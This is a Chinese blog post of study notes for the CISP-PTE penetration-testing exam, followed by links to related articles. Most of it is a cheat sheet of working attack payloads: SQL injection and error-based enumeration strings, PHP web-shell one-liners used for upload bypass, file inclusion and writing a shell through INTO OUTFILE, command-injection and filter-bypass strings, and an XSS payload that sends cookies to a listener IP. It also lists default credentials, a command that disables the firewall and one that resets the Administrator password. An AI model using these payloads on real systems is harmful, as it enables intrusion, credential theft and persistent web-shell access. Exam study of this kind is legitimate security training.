pte考前笔记

最新推荐文章于 2025-11-30 22:23:34 发布
原创 最新推荐文章于 2025-11-30 22:23:34 发布 · 757 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #网络安全 #web安全

sql注入

手工注入
万能密码
admin’ or ‘1’ =‘1
注释
admin’ or 1=1 #

查表 select database()
select group_concat(table_name) from information_schema.tables where table_schema=‘’ #
过滤了 – #
用 ;%00

insert into(1,2,3,4,5) values ( 1,2,3,4,5 )
注意二次注入 巧用#
并且在查询数据时

读取文件时 load_file(‘’)

报错注入
updatexml(1,concat(0x7e,(select database()),0x7e),1)

insert into查询时报错 我们用
(select group_concat(username) from (select * from users1 limit 0,1)as a)

文件上传

文件后缀绕过 大小写绕过
Php php3 php5 pht phtml
内容绕过 用
< script language=‘php’>@eval($_POST[cmd]);< /script>
文件头绕过 用
GIF89a GIF87a

代码审计

构造闭合
a=");system("ls
定位符
ls >1.txt
反序列化

<?php $TEMP = "Whatever is worth doing is worth doing well."; echo serialize($TEMP) ?>

TEMP="CISP";serialize(TEMP="CISP"; serialize(TEMP="CISP";serialize(TEMP);
echo $TEMP;

cd[]=1
w={“bar1”:“2021a”,“bar2”:“[[1],1,2,3,4]”,“bar3”:“[cisp-pte,2]”}

xss

nc -lvvp 1145
python -m http.server 1145
python2 -m SimpleHttpServer 1145

<script>document.write('<img src="http://192.168.89.1:4444?' + document.cookie +'"/>');</script>

文件包含

记住伪协议
php://filter/read=convert.base64-encode/resouce=…key.flag

data://text.plain,<?php system('cat /flag.php')?>

data://text.plain;base64, <?php @eval($_POST['cmd']);?>

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

命令执行

tac
sed ‘’ …/key
ca\t …/key
ca"t …/key
more
过滤了key 或者php 用* 去匹配

连接符号
&& || ;过滤了空格 用< 重定向

业务逻辑
xff头
client-ip
更改请求头 TRACE找到源ip

日志审计

^.*
^开始匹配
. 匹配什么

  • 出现一次或多次
    ^.172.16.12.1. “[A-Z]+ /..(php|jsp|asp).” 200
    ^.* “[A-Z]+ /(?!/?(index|manage|footer|upload))..(php|jsp|asp).” 200

实操题

phpmyadmin
root/root
root/123456

select ‘<?php @eval($_POST['cmd']);?>’ into outfile ‘C:/phpstudy_pro/WWW/shell.php’

加密方式

md5
md5(md5)
sha-1

3306

netsh firewall set opmode disable
netsh firewall set opmode disable

net user Administrator Admin123

cisp-pte课堂笔记-五天培训全-202209
11-16
1.rce 2.sql注入 3.逻辑漏洞 4.文件包含 5.文件上传 6.考试综合题 7.总结
PTE两周速成指南及江西考点初体验
拔牙不打麻药
04-06 1813
目录一些乱七八糟的话备考计划模考C卷Read aloud(RA)Descirbe Image(DI)Retell Sentence(RS)Summarize Spoken Text(SST)Write Essay(WE)Write From Dictation(WFD)南昌考点初体验 一些乱七八糟的话 本来我是打算考雅思的,十一月报了一个口语班,打算十二月去杭州考点考试,结果因为疫情,十二月和一月的都取消了,又报了二月的杭州的考试,那会又有疫情,又取消了,我的同学和我说可以报上海的考试,三月我就报了上海南丰
为什么那么多人选择承制的CISP-PTE培训?
aqpxrz的博客
03-26 6256
市面上做CISP-PTE认证培训的机构林林总总,为什么那么多人选择承制的CISP-PTE培训?各位做渗透测试的小伙伴不妨来跟我一起看一下: 强大的师资背景 1 授课老师实力雄厚 承制科技拥有多位资历非常丰富的CISP-PTE讲师,单从授课次数来讲,仅其中三位讲师加起来就有57次培训讲师的授课经历、参加过的项目/赛事支持总计43+次,其中不乏全国性网络安全赛事的冠军,更有讲师担任过国内网络安全赛事的出题人和裁判。 2 助教班主任尽心尽责 承制科技每个班级都配有助教和班主任,整个学习过...
网络安全证书怎么选?CISP-PTE/CEH/CISSP,不同阶段适合的证书全解析(附备考攻略)
资深程序员,曾自学JAVA,C#,如今从业于网安行业
09-22 827
网络安全证书选择指南 本文针对不同阶段的网络安全从业者,分析了CISP-PTE、CEH和CISSP三大热门证书的适用场景、考试特点和备考策略。 CISP-PTE:适合0-1年经验的入门者,注重实战渗透测试能力,国内企业认可度高,需强制培训(1.5-2万元),3年续期一次。 CEH:适合1-3年经验者,覆盖网络安全全领域知识,国际通用且适合外企,自学报考费约8000元,但国内认可度较低。 CISSP:面向5年以上资深从业者,是安全管理岗位的黄金证书,终身有效但考试难度大(通过率20%-30%),费用约4-6万
PTE阶段规划
m0_62574889的博客
10-09 251
复习的各个阶段 线下应该如何 rs应对 从来都是流利度大于内容 推荐的练习网站 口语 DI 关键词是不能念错 口语 RL rl每日练习方法 ASQ 写作 swt 阅读 一半靠机经 听力
CISP-PTS考试通关经验总结
Python_paipai的博客
05-18 1204
先来总结一下考证经历,试题难度还是有的,不过因为是报班考的(也只能通过培训机构报),所以,很多题目都在平常练习中会有涉及,考前也会有一些特训啥的,考起来也不是说特别难截止至2023年10月24日,据中国信息安全评测中心数据,目前PTS和PTE持证人数大概是 720和 7484 左右关于培训和考试时间,当时找了好几家培训机构,发现他们培训时间多数都是工作日的,想找周末的,最终同事找了家机构,然后一起抱团考,还可以打个折。不过考试时间,基本都是工作日的,其实也还好,考试 4 个小时,请半天假就OK。
CISSP考试经验分享
lanyef的专栏
10-15 4374
2018年10月,在折腾了半年之久后,终于通过了CISSP考试,后续按要求提交申请进行背书,调查没问题就可以收到认证了。思来想去,简单写个总结,作为半年备考的终点,同时希望能够给准备考试的同学提供一些帮助。 关于教材:OSG第七版中文版,AIO英文版,谷安培训练习题(基于第六版教材),cissp-official-isc-practice-tests,谷安培训P...
网安人必备的CISP有什么用?考证需要学哪方面的技术?一篇文章带你讲透
白帽阿叁的博客
11-07 1290
去年转行网络安全时,我投了 30 份安全工程师简历,只收到 2 个面试邀请 ——HR 说 “你没相关证书,我们优先考虑有 CISP 的候选人”。后来我花 3 个月备考 CISP,拿到证书后再投简历,不仅面试邀约翻了 3 倍,最终入职的薪资还比同岗位无证同事高了 15%。很多人对 CISP 有疑问:“它只是个证书,真的这么重要吗?”“零基础能考吗?需要学哪些技术?
2025网络安全就业前景:人才缺口300万+,薪资持续飙升,女生学网络安全好就业吗?网络安全就业薪资多少学网络安全好找工作吗?
2401_85280106的博客
11-10 716
2025年网络安全行业将迎来新一轮爆发,现在入行正是黄金期!据猎聘网数据,持证工程师平均3次面试即可拿到offer,而无证者平均需要8次。与其观望犹豫,不如立即行动——你的第一个安全认证,可能就是年薪30万的起点!文章来自网上,侵权请联系博主。
人才缺口300万+,薪资持续飙升,女生学网络安全好就业吗?网络安全就业薪资多少学网络安全好找工作吗?
小司机的奥拓
08-19 1450
2025年网络安全行业将迎来新一轮爆发,现在入行正是黄金期!据猎聘网数据,持证工程师平均3次面试即可拿到offer,而无证者平均需要8次。与其观望犹豫,不如立即行动——你的第一个安全认证,可能就是年薪30万的起点!
CISP-PTE考前实操练习3
2301_79546223的博客
09-14 657
CISP-PTE考前实操练习题,渗透测试
信息收集(CISP-PTE笔记
土豆片的博客
11-09 2157
PTE测试—>风险评估基于信息收集—>发现漏洞—>利用漏洞—>补救建议。
CISP-PTE学习笔记综合考试题复现WP
千寻的博客
10-16 1893
问题1:请扫描目标主机(IP地址请查看拓补图)开放的端口,key6就在【rebots.txt】中 问题2:key7存储在网站根目录下载的【key.php】文件中 问题3:请登录到远程计算机,key8将会在桌面上显示
996PC端 传奇游戏架设笔记
酷酷的鱼 - 网络编程,服务器安全专栏
11-30 144
2、有些版本有自己增加的NPC或者武器、所以就会有版本补丁,需要在JpkList.txt增加补丁所在地址和解析密码、并且把补丁文件复制到热血传奇客户端安装目录下。多个版本的时候 在MirServer采用多个不同名称的文件夹即可,游戏区端口要选择不一样的。3、然后打开登录生成器、确保版本资源目录是对的,然后资源读取规则,需要设置成你热血传奇安装目录。4、确保当前登录生成器里面的授权密钥跟GameServer的登录网关->安全过滤设置->登录器识别码密钥写的是一样的。1、服务器需要安装VC++扩展包。
C语言学习笔记(1)——输入输出,数据类型
最新发布
DK3314219995的博客
11-30 749
CPU的位数主要决定了其通用寄存器的宽度,这直接影响CPU单次操作能处理的数据量和理论上能直接寻址的内存空间范围,但实际实现可能受地址总线宽度、操作系统和硬件架构的影响。
Compose笔记(五十七)--snapshotFlow
ljt2724960661的博客
11-29 568
这一节主要了解一下snapshotFlow,在Compose开发中,snapshotFlow是连接Compose状态与协程流的核心...
vivado FFT IP 学习及仿真笔记
在读研究生,偏FPGA功能设计
11-30 648
本文介绍了FFT(快速傅里叶变换)的基本原理及其IP核实现方法。主要内容包括:1)FFT作为DFT的快速算法,其计算结果与DFT一致;2)FFT IP核的驱动逻辑,详细解析了AXI4-Stream协议接口及配置参数;3)FFT IP核的配置方法,涵盖架构选择、数据格式、缩放选项等关键设置;4)通过Matlab和Verilog仿真对比验证了FFT IP核的正确性,结果显示与理论值误差在±3以内。文章还提供了相关参考资料,为FPGA实现FFT提供了实用指导。
Ruey S. Tsay《时间序列分析》Python实现笔记:多元时间序列分析
hanyu4120的专栏
11-29 514
在数字货币市场中,单一资产的价格波动并非孤立事件——BTC的暴涨可能带动ETH跟涨,主流币的恐慌抛售也会引发山寨币的连锁下跌。这种多资产间的联动关系,正是多元时间序列分析的研究核心。本章将聚焦三大核心工具,带你从“单资产择时”升级到“多资产套利与对冲”的进阶维度,为构建统计套利、跨市场策略提供理论与实战支撑。
湘大头歌程-Ride to Office练习笔记
myw071205的博客
11-29 735
Charley骑车从起点到终点(4500米)需要有人陪伴骑行,遇到更快者会加速跟上。输入给出同行者的速度v和出发时间t,要求计算Charley到达终点的最短时间(小数向上取整)。关键思路是Charley最终会与最快到达终点的人同时到达。解题时忽略提前出发者,对每个同行者计算其到达时间t + ceil(4.5/v*3600),取最小值作为答案。代码使用limits.h初始化最小值和math.h的ceil函数处理取整。后文详细介绍了limits.h的常量定义和math.h的四种取整函数的功能与区别
检查进程的PTE版本1.0
标题"C++ v1.0"和描述"Check Process's PTE v1.0"指向了一个专注于操作系统的具体功能,特别是与进程地址空间和页面表条目(Page Table Entries,简称PTE)管理相关的C++程序或工具。PTE是操作系统用来管理虚拟内存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值